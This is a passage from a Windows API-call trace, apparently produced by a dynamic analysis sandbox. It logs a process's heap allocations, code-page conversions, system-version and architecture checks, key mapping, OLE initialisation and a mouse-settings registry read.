0xba40a0 [0265.734] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x52) returned 0xba4100 [0265.734] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x2a) returned 0xb9c6d8 [0265.735] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x3c) returned 0xb921f8 [0265.735] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x54) returned 0xba4160 [0265.735] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x24) returned 0xb9c040 [0265.735] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x30) returned 0xb9c710 [0265.735] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x8c) returned 0xba30a0 [0265.735] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xba35b0 | out: hHeap=0xb80000) returned 1 [0265.736] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x80) returned 0xba3138 [0265.736] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x8, Size=0x800) returned 0xba31c0 [0265.736] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0265.736] GetLastError () returned 0x0 [0265.736] SetLastError (dwErrCode=0x0) [0265.736] GetLastError () returned 0x0 [0265.736] SetLastError (dwErrCode=0x0) [0265.736] GetLastError () returned 0x0 [0265.736] SetLastError (dwErrCode=0x0) [0265.736] GetACP () returned 0x4e4 [0265.736] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x220) returned 0xba39c8 [0265.736] GetLastError () returned 0x0 [0265.736] SetLastError (dwErrCode=0x0) [0265.736] IsValidCodePage (CodePage=0x4e4) returned 1 [0265.736] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x77f9ec | out: lpCPInfo=0x77f9ec) returned 1 [0265.736] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x77f4b4 | out: lpCPInfo=0x77f4b4) returned 1 [0265.736] GetLastError () returned 0x0 [0265.736] SetLastError (dwErrCode=0x0) [0265.736] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x77f8c8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0265.736] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x77f8c8, cbMultiByte=256, lpWideCharStr=0x77f238, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0265.737] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x77f4c8 | out: lpCharType=0x77f4c8) returned 1 [0265.737] GetLastError () returned 0x0 [0265.737] SetLastError (dwErrCode=0x0) [0265.737] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x77f8c8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0265.737] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x77f8c8, cbMultiByte=256, lpWideCharStr=0x77f208, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0265.737] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0265.737] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x77eff8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0265.737] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x77f7c8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x96\x05\x9f¯\x04úw", lpUsedDefaultChar=0x0) returned 256 [0265.737] GetLastError () returned 0x0 [0265.737] SetLastError (dwErrCode=0x0) [0265.737] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x77f8c8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0265.737] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x77f8c8, cbMultiByte=256, lpWideCharStr=0x77f218, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0265.737] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0265.737] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x77f008, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0265.737] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x77f6c8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x96\x05\x9f¯\x04úw", lpUsedDefaultChar=0x0) returned 256 [0265.737] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0265.738] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x2c4d1c) returned 0x0 [0265.738] RtlSizeHeap (HeapHandle=0xb80000, Flags=0x0, MemoryPointer=0xba3138) returned 0x80 [0265.738] RtlSizeHeap (HeapHandle=0xb80000, Flags=0x0, MemoryPointer=0xba3138) returned 0x80 [0265.738] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x3c) returned 0xb92240 [0265.739] RtlSizeHeap (HeapHandle=0xb80000, Flags=0x0, MemoryPointer=0xba3138) returned 0x80 [0265.739] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xb93300 [0265.739] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xb92a80 [0265.739] GetVersionExW (in: lpVersionInformation=0x77f8e0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x1f1e1d1c, dwMinorVersion=0x23222120, dwBuildNumber=0x27262524, dwPlatformId=0xb1000f, szCSDVersion="\x04") | out: lpVersionInformation=0x77f8e0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0265.739] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xb93300 | out: hHeap=0xb80000) returned 1 [0265.739] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xb9fbc0 [0265.739] GetCurrentProcess () returned 0xffffffff [0265.739] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x77fa30 | out: Wow64Process=0x77fa30) returned 1 [0265.739] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0265.739] GetProcAddress (hModule=0x75990000, lpProcName="GetNativeSystemInfo") returned 0x759b10b5 [0265.739] GetNativeSystemInfo (in: lpSystemInfo=0x77f9fc | out: lpSystemInfo=0x77f9fc*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0265.740] FreeLibrary (hLibModule=0x75990000) returned 1 [0265.740] RtlSizeHeap (HeapHandle=0xb80000, Flags=0x0, MemoryPointer=0xba3138) returned 0x80 [0265.740] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xb93300 [0265.740] RtlSizeHeap (HeapHandle=0xb80000, Flags=0x0, MemoryPointer=0xba3138) returned 0x80 [0265.741] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xb93318 [0265.741] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba4038 [0265.741] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xb93330 [0265.741] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba4048 [0265.741] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xb93348 [0265.741] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba4058 [0265.741] RtlSizeHeap (HeapHandle=0xb80000, Flags=0x0, MemoryPointer=0xba3138) returned 0x80 [0265.741] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xb93360 [0265.741] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba4068 [0265.741] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xb93378 [0265.741] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba4078 [0265.741] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xb93390 [0265.741] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5088 [0265.741] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xb933a8 [0265.741] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba50b0 [0265.741] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xb933c0 [0265.741] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba50c0 [0265.741] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xb933d8 [0265.741] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba50d0 [0265.741] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xb933f0 [0265.741] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba50e0 [0265.742] MapVirtualKeyW (uCode=0x5b, uMapType=0x0) returned 0x5b [0265.742] MapVirtualKeyW (uCode=0x10, uMapType=0x0) returned 0x2a [0265.742] MapVirtualKeyW (uCode=0xa0, uMapType=0x0) returned 0x2a [0265.742] MapVirtualKeyW (uCode=0xa1, uMapType=0x0) returned 0x36 [0265.742] MapVirtualKeyW (uCode=0x11, uMapType=0x0) returned 0x1d [0265.742] MapVirtualKeyW (uCode=0x12, uMapType=0x0) returned 0x38 [0265.742] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xb93408 [0265.742] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba50f0 [0265.742] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba54b0 [0265.742] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5100 [0265.742] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba54c8 [0265.742] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5110 [0265.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba54e0 [0265.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5120 [0265.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba54f8 [0265.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5130 [0265.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba5510 [0265.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5140 [0265.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba5528 [0265.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5150 [0265.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba5540 [0265.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5160 [0265.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba5558 [0265.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5170 [0265.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba5570 [0265.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5180 [0265.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5190 [0265.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba5588 [0265.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba51a0 [0265.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba55a0 [0265.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba51b0 [0265.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba55b8 [0265.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba51c0 [0265.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba55d0 [0265.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba51d0 [0265.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba55e8 [0265.744] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba51e0 [0265.744] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba51f0 [0265.744] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc11e [0265.744] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba5600 [0265.744] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5200 [0265.744] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x40) returned 0xb92288 [0265.744] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0265.744] OleInitialize (pvReserved=0x0) returned 0x0 [0265.754] RtlSizeHeap (HeapHandle=0xb80000, Flags=0x0, MemoryPointer=0xba3138) returned 0x80 [0265.755] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xba5618 [0265.755] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5220 [0265.755] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Mouse", ulOptions=0x0, samDesired=0x1, phkResult=0x77fa04 | out: phkResult=0x77fa04*=0xf8) returned 0x0 [0265.756] RegQueryValueExW (in: hKey=0xf8, lpValueName="SwapMouseButtons", lpReserved=0x0, lpType=0x0, lpData=0x77fa20, lpcbData=0x77fa08*=0x8 | out: lpType=0x0, lpData=0x77fa20*=0x30, lpcbData=0x77fa08*=0x4) returned 0x0 [0265.756] RegCloseKey (hKey=0xf8) returned 0x0 [0265.756] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 